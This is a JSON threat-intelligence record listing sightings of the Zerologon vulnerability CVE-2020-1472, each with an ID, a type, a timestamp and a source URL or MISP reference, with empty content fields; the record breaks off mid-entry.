{"vulnerability": "cve-2020-1472", "sightings": [{"uuid": "ff04e558-99f3-4505-826e-b69c6838b85c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/e5e0a1d0-9ce0-400d-acdd-2a6c6f47bcb3", "content": "", "creation_timestamp": "2020-10-14T01:31:22.000000Z"}, {"uuid": "16e8778e-2832-4aa2-93aa-0608047d72ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/23e6786e-b796-48cc-8bb6-0e1ddb595c8a", "content": "", "creation_timestamp": "2020-10-16T06:26:38.000000Z"}, {"uuid": "d19ad9e0-b14e-4104-b906-2acdac67c7e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5f850411-c103-491f-abff-9421425403cf", "content": "", "creation_timestamp": "2020-10-21T08:19:11.000000Z"}, {"uuid": "1eff83ed-f3d8-4d0a-a401-de690c4fd8b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5b7316df-33f3-4e2e-95a2-55d4e7a8ee85", "content": "", "creation_timestamp": "2020-10-27T08:03:33.000000Z"}, {"uuid": "a71c27e7-6e0b-45b5-b9ad-19e755ce25e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/ae5eefd4-2626-4235-bd09-9924685780bd", "content": "", "creation_timestamp": "2020-11-18T18:55:51.000000Z"}, {"uuid": "594bea82-53a7-4ba0-a237-be3e57f38f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": 
"MISP/42d04e94-bf5b-427d-acc8-f5d740675941", "content": "", "creation_timestamp": "2020-10-20T15:57:21.000000Z"}, {"uuid": "a2771b54-121d-408e-97a0-b12b33e0b1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/453274cf-e60d-452a-b88e-0bf6a5a6dae4", "content": "", "creation_timestamp": "2020-10-13T06:50:38.000000Z"}, {"uuid": "9b6ab4ed-5c19-4c90-a6e9-bbbf08220743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/b426aa9c-dc22-4a91-8213-f8d513405423", "content": "", "creation_timestamp": "2020-12-09T07:18:56.000000Z"}, {"uuid": "ec5df526-fbd0-48f7-a1fa-42e2e428395b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/e8363b57-fbf3-40fb-934f-00f1ebc415fd", "content": "", "creation_timestamp": "2020-09-25T10:00:23.000000Z"}, {"uuid": "482b8ae8-3ac3-4c00-a777-19ad370eb20b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422", "content": "", "creation_timestamp": "2021-11-08T08:58:19.000000Z"}, {"uuid": "ee7ba8c2-e11d-4480-af9a-0002fe79fbc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2021-11-20T09:53:52.000000Z"}, {"uuid": "7a407eb1-4ef0-4a68-99d7-43f1714163b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/d925a2ee-e7cf-46f6-bec1-ad8e19122730", "content": "", "creation_timestamp": "2020-10-20T15:58:05.000000Z"}, {"uuid": "9ed2ac85-7eab-48a3-aa0c-694c29754802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/eafff3bd-a5ac-4799-b860-febbeaf42a54", "content": "", "creation_timestamp": "2020-10-19T15:29:02.000000Z"}, {"uuid": "d323fd81-7d6f-44ae-8db9-43c3c1e6b78b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/09e89b96-7b85-4a49-9556-d6b25b6b93e5", "content": "", "creation_timestamp": "2020-10-19T15:30:03.000000Z"}, {"uuid": "818819c9-95a3-41b7-b407-3fb2be89d14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/f628d96f-2958-4717-91da-e86aace4925d", "content": "", "creation_timestamp": "2020-10-13T15:16:18.000000Z"}, {"uuid": "60db31c5-941c-4242-980b-272dd3f631ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8d121e04-9fcc-48d9-be88-3af090913786", "content": "", "creation_timestamp": "2020-10-22T19:44:04.000000Z"}, {"uuid": "d5e69d2d-395f-4ed3-95e5-b6a8af54717b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/73846acc-5c3e-48e2-9c0a-c9de0351c60e", "content": "", "creation_timestamp": "2020-11-07T03:00:07.000000Z"}, {"uuid": "2ef8a26a-6f15-4106-9877-a6b393f30126", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5362d288-c25b-43e5-9311-2ddedfe84549", "content": "", "creation_timestamp": "2020-10-22T19:51:04.000000Z"}, {"uuid": "01fb1493-b55b-4629-aaa7-453e92d4a0e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/1bf3b9ea-9716-4615-8718-2c6ec9a0d635", "content": "", "creation_timestamp": "2020-11-17T19:15:04.000000Z"}, {"uuid": "852037c3-14b3-4413-bde2-7d4a805e2e4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/c7d9eed5-d71b-4433-8433-3db121149d72", "content": "", "creation_timestamp": "2020-11-21T03:00:06.000000Z"}, {"uuid": "819ffd2e-cce0-4a05-8284-dba1ebec956b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/44612345-f9b0-4600-ba82-7b8388a6592f", "content": "", "creation_timestamp": "2020-11-18T03:00:05.000000Z"}, {"uuid": "64d8c191-a278-4d50-8af3-dd58b57681ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/5b421c0a-3bc4-4bce-a7cc-daa036ea090b", "content": "", "creation_timestamp": "2021-09-16T11:20:21.000000Z"}, {"uuid": "89f473bb-c891-4070-a071-222258aa5e7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": 
"2022-11-01T20:54:34.000000Z"}, {"uuid": "ea2a19ce-24d7-48a2-bf02-de8515b6a050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/be3a3889-2c18-4d6d-ae57-71ae24e32512", "content": "", "creation_timestamp": "2023-01-10T20:08:12.000000Z"}, {"uuid": "5e7dd05c-f0eb-45a2-bceb-641d59fed5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "2a69030a-5ee7-479d-bff5-79814cfb016b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/63ddead6-4b82-414c-ad8e-c516b950b446", "content": "", "creation_timestamp": "2021-10-25T22:32:43.000000Z"}, {"uuid": "24e76273-7f67-4832-a60c-5a5e82f438b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "fde39615-f1b9-411f-b6d2-aaf9015fa2f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8a5d9ef7-0fae-4fcc-a606-d3701ec5f0e0", "content": "", "creation_timestamp": "2024-10-15T11:39:19.000000Z"}, {"uuid": "44d4f17c-a78d-4f27-b59c-a79c0aa2522a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": 
"MISP/ad5af8e7-0c4c-4b64-b36d-1c80910c1140", "content": "", "creation_timestamp": "2023-06-23T06:24:08.000000Z"}, {"uuid": "57511465-1caa-4875-be29-7bdf188952f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/cec219ff-8f6d-45c9-bdbb-b4fb8c9c0f2b", "content": "", "creation_timestamp": "2023-09-20T10:39:36.000000Z"}, {"uuid": "15e9b780-03a9-416a-8443-b69ca916fe41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113549922551599234", "content": "", "creation_timestamp": "2024-11-26T15:18:37.016075Z"}, {"uuid": "55499d09-71df-4746-9ee4-beb5c2a5b569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://msrc.microsoft.com/blog/2020/10/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "content": "", "creation_timestamp": "2020-10-29T06:00:00.000000Z"}, {"uuid": "1106f773-c455-4503-be34-770bd195aa02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://msrc.microsoft.com/blog/2021/01/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "content": "", "creation_timestamp": "2021-01-14T07:00:00.000000Z"}, {"uuid": "5e5788fd-0b78-47ee-b182-60191dc7e286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": 
"https://feedsin.space/feed/CISAKevBot/items/2970987", "content": "", "creation_timestamp": "2024-12-24T20:22:42.015800Z"}, {"uuid": "40576f4e-7f74-4acd-80ba-2253e8fb5690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "0c7453f8-c4a8-4aa1-ae74-d4c7b36685e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:24.000000Z"}, {"uuid": "d11546de-49bd-4b70-8fdc-c5f62f738559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3li5i54s5sp2p", "content": "", "creation_timestamp": "2025-02-14T15:06:51.072405Z"}, {"uuid": "2ba6c1fe-1b4a-47d7-871b-6dbb0336e524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:09:46.000000Z"}, {"uuid": "6f391517-9977-40e2-8125-03a71262f83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/23e6786e-b796-48cc-8bb6-0e1ddb595c8a", "content": "", "creation_timestamp": "2025-04-10T17:09:39.000000Z"}, {"uuid": "df07fbf7-ce61-4588-8df6-e9348262b4b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/strikoder/f854b31c91949abacdb498901cb0a548", "content": "", "creation_timestamp": "2025-06-28T11:13:37.000000Z"}, {"uuid": "6fadb6bb-149c-4f65-9234-ce74f227d953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.981690Z"}, {"uuid": "1b7a2624-6653-457f-8f8a-5041e2814228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "7fdf30d7-6128-4264-9951-50f293bc18b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "97069a27-402a-4bd6-8454-6caa1af047d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "9be1c5b8-11fc-4504-bc06-037419b1ede3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "252a07bf-b52c-4651-b41d-914db14f2b8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "3c98e81d-64ff-45e6-8b01-c4a8ac7f0755", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;utm_source=rss&amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "80578407-c893-4f73-b3ad-8edc7c15712e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "53596fbd-8ca7-4b21-a9ad-d723a6484b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "a229f62a-5fe4-4352-8226-6ef2f452a2e7", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "bf57a0b1-ce8d-4cd5-abcf-3f9e477b11a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "27549039-ca0c-4c9d-b04f-926a39af43be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "content": "", "creation_timestamp": "2020-09-22T19:37:57.000000Z"}, {"uuid": "a51f6190-e101-45bc-82b4-f6c8edbe0089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", "creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "a3b5892b-1ff9-41bd-b6d8-518b2ff795ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=16D213D1-AD3C-5C18-AD6C-DE680A77E410&amp;amp;utm_source=rss&amp;amp;utm_medium=rss", "content": "", 
"creation_timestamp": "2025-10-04T20:29:19.000000Z"}, {"uuid": "00f2f825-e320-466d-af09-0b092f145431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://sploitus.com/exploit?id=F382D9A5-C23A-5DED-AD53-95C063D21BCB", "content": "", "creation_timestamp": "2025-10-18T13:33:56.000000Z"}, {"uuid": "d56022af-7913-474b-afba-8121b0ff73f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:05.000000Z"}, {"uuid": "d0924c10-2014-4ed0-959b-832ca86b4413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:46.000000Z"}, {"uuid": "b1cef8d7-331e-47b5-8e43-7e347cacebb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "7f47402b-1773-4567-821b-2cf35d447c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-c39acbe0-91886c343547fcce", "content": "", "creation_timestamp": "2025-12-05T12:35:58.738708Z"}, {"uuid": "3ae6c0d0-ca45-4885-af72-d7bdeeaa479e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-1fdfda19-2805a58255f192e9", "content": "", "creation_timestamp": "2026-03-06T10:29:26.852538Z"}, {"uuid": "c4c67c9d-f14b-4d68-baef-888b04b07874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://bsky.app/profile/cvedatabase.bsky.social/post/3mfcqatvdov2h", "content": "", "creation_timestamp": "2026-02-20T18:26:01.955473Z"}, {"uuid": "e37ac697-74f4-40fe-956f-c6b3b1d36f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/alon710/173eb4d5dfd9e2a8aa8dcc576ed70b11", "content": "", "creation_timestamp": "2026-02-06T23:50:06.000000Z"}, {"uuid": "7db3f012-f6a6-41a0-b5d3-e70ae290fa76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/hyokkaystyokaluja-julkaistu-kriittiselle-zerologon-haavoittuvuudelle", "content": "", "creation_timestamp": "2020-09-18T06:16:13.000000Z"}, {"uuid": "dc17aa6c-5a63-4834-becb-c3454bb95d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/8a5d9ef7-0fae-4fcc-a606-d3701ec5f0e0", "content": "", "creation_timestamp": "2026-01-09T20:17:31.000000Z"}, {"uuid": "f3bf1e81-f654-4617-881f-ba84477e6386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2020-1472", "type": "seen", "source": 
"https://vulnerability.circl.lu/bundle/d41ef7ed-39b6-4408-a718-2c3bce5fc99e", "content": "", "creation_timestamp": "2025-03-03T08:51:11.190614Z"}, {"uuid": "746ca620-7371-442f-88ca-2084ae6f0808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2020-1472", "type": "seen", "source": "https://mastodon.social/users/verbrecher/statuses/115899541969537991", "content": "", "creation_timestamp": "2026-01-15T14:17:45.097945Z"}, {"uuid": "a824b9e3-c0d2-4f80-9354-c0cbf72070d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://mastodon.social/users/verbrecher/statuses/115899549143144889", "content": "", "creation_timestamp": "2026-01-15T14:19:33.927368Z"}, {"uuid": "1347fdf9-f4c9-41b6-9371-b54a9ee1a6fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=499", "content": "", "creation_timestamp": "2020-08-12T04:00:00.000000Z"}, {"uuid": "b9e10817-9943-4727-8aa5-cd816ddc5dd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "7d5d2a69-e6fb-4f7d-a723-436db986935d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/f59984a2-fb70-4f3b-907e-489d2e9f1ee2", "content": "", 
